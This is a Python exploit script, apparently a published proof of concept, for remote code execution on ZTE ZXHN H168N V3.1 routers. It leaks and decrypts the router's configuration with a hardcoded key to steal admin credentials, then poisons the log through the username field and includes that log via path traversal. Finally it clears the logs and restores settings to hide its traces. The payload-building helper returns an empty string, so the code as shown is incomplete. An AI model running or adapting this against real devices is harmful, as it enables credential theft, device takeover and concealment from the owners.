# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass # Author: l34n / tasos meletlidis # Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/ import http.client, requests, os, argparse, struct, zlib from io import BytesIO from os import stat from Crypto.Cipher import AES def login(host, port, username, password): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "Username": username, "Password": password, "Frm_Logintoken": "", "action": "login" } requests.post(f"http://{host}:{port}/", headers=headers, data=data) def logout(host, port): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_LogOff": "1", "IF_LanguageSwitch": "", "IF_ModeSwitch": "" } requests.post(f"http://{host}:{port}/", headers=headers, data=data) def leak_config(host, port): conn = http.client.HTTPConnection(host, port) boundary = "---------------------------25853724551472601545982946443" body = ( f"{boundary}\r\n" 'Content-Disposition: form-data; name="config"\r\n' "\r\n" "\r\n" f"{boundary}--\r\n" ) headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "Content-Length": str(len(body)), "Connection": "keep-alive", } conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers) response = conn.getresponse() response_data = response.read() with open("config.bin", "wb") as file: file.write(response_data) conn.close() def _read_exactly(fd, size, desc="data"): chunk = fd.read(size) if len(chunk) != size: return None return chunk def _read_struct(fd, fmt, desc="struct"): size = struct.calcsize(fmt) data = _read_exactly(fd, size, desc) if data is None: return None return struct.unpack(fmt, data) def read_aes_data(fd_in, key): encrypted_data = b"" while True: aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header") if aes_hdr is None: return None _, chunk_len, marker = aes_hdr chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data") if chunk is None: return None encrypted_data += chunk if marker == 0: break cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB) fd_out = BytesIO() fd_out.write(cipher.decrypt(encrypted_data)) fd_out.seek(0) return fd_out def read_compressed_data(fd_in, enc_header): hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6])) if enc_header[6] != hdr_crc: return None total_crc = 0 fd_out = BytesIO() while True: comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header") if comp_hdr is None: return None uncompr_len, compr_len, marker = comp_hdr chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data") if chunk is None: return None total_crc = zlib.crc32(chunk, total_crc) uncompressed = zlib.decompress(chunk) if len(uncompressed) != uncompr_len: return None fd_out.write(uncompressed) if marker == 0: break if enc_header[5] != total_crc: return None fd_out.seek(0) return fd_out def read_config(fd_in, fd_out, key): ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header") if ver_header_1 is None: return ver_header_2_offset = 0x14 + ver_header_1[4] fd_in.seek(ver_header_2_offset) ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header") if ver_header_2 is None: return ver_header_3_offset = ver_header_2[10] fd_in.seek(ver_header_3_offset) ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header") if ver_header_3 is None: return signed_cfg_size = ver_header_3[3] file_size = stat(fd_in.name).st_size fd_in.seek(0x80) sign_header = _read_struct(fd_in, ">3I", desc="signature header") if sign_header is None: return if sign_header[0] != 0x04030201: return sign_length = sign_header[2] signature = _read_exactly(fd_in, sign_length, desc="signature") if signature is None: return enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header") if enc_header_raw is None: return encryption_header = struct.unpack(">15I", enc_header_raw) if encryption_header[0] != 0x01020304: return enc_type = encryption_header[1] if enc_type in (1, 2): if not key: return fd_in = read_aes_data(fd_in, key) if fd_in is None: return if enc_type == 2: enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header") if enc_header_raw is None: return encryption_header = struct.unpack(">15I", enc_header_raw) if encryption_header[0] != 0x01020304: return enc_type = 0 if enc_type == 0: fd_in = read_compressed_data(fd_in, encryption_header) if fd_in is None: return fd_out.write(fd_in.read()) def decrypt_config(config_key): encrypted = open("config.bin", "rb") decrypted = open("decrypted.xml", "wb") read_config(encrypted, decrypted, config_key) with open("decrypted.xml", "r") as file: contents = file.read() username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0] password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0] encrypted.close() os.system("rm config.bin") decrypted.close() os.system("rm decrypted.xml") return username, password def change_log_level(host, port, log_level): level_map = { "critical": "2", "notice": "5" } headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "Apply", "_BASICCONIG": "Y", "LogEnable": "1", "LogLevel": level_map[log_level], "ServiceEnable": "0", "Btn_cancel_LogManagerConf": "", "Btn_apply_LogManagerConf": "", "downloadlog": "", "Btn_clear_LogManagerConf": "", "Btn_save_LogManagerConf": "", "Btn_refresh_LogManagerConf": "" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data) def change_username(host, port, new_username, old_password): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "Apply", "_InstID": "IGD.AU2", "Right": "2", "Username": new_username, "Password": old_password, "NewPassword": old_password, "NewConfirmPassword": old_password, "Btn_cancel_AccountManag": "", "Btn_apply_AccountManag": "" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data) def clear_log(host, port): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "clearlog" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data) def refresh_log(host, port): headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "IF_ACTION": "Refresh" } requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua") requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data) def trigger_rce(host, port): requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0") requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0") def rce(cmd): return f"" def pwn(config_key, host, port): leak_config(host, port) username, password = decrypt_config(config_key) login(host, port, username, password) shellcode = "echo \"pwned\"" payload = rce(shellcode) change_username(host, port, payload, password) refresh_log(host, port) change_log_level(host, port, "notice") refresh_log(host, port) trigger_rce(host, port) clear_log(host, port) change_username(host, port, username, password) change_log_level(host, port, "critical") logout(host, port) print("[+] PoC complete") def main(): parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1") parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz<vz&f^9", help="Leaked config encryption key from cspd") parser.add_argument("--host", required=True, help="Target IP address of the router") parser.add_argument("--port", required=True, type=int, help="Target port of the router") args = parser.parse_args() pwn(args.config_key, args.host, args.port) if __name__ == "__main__": main()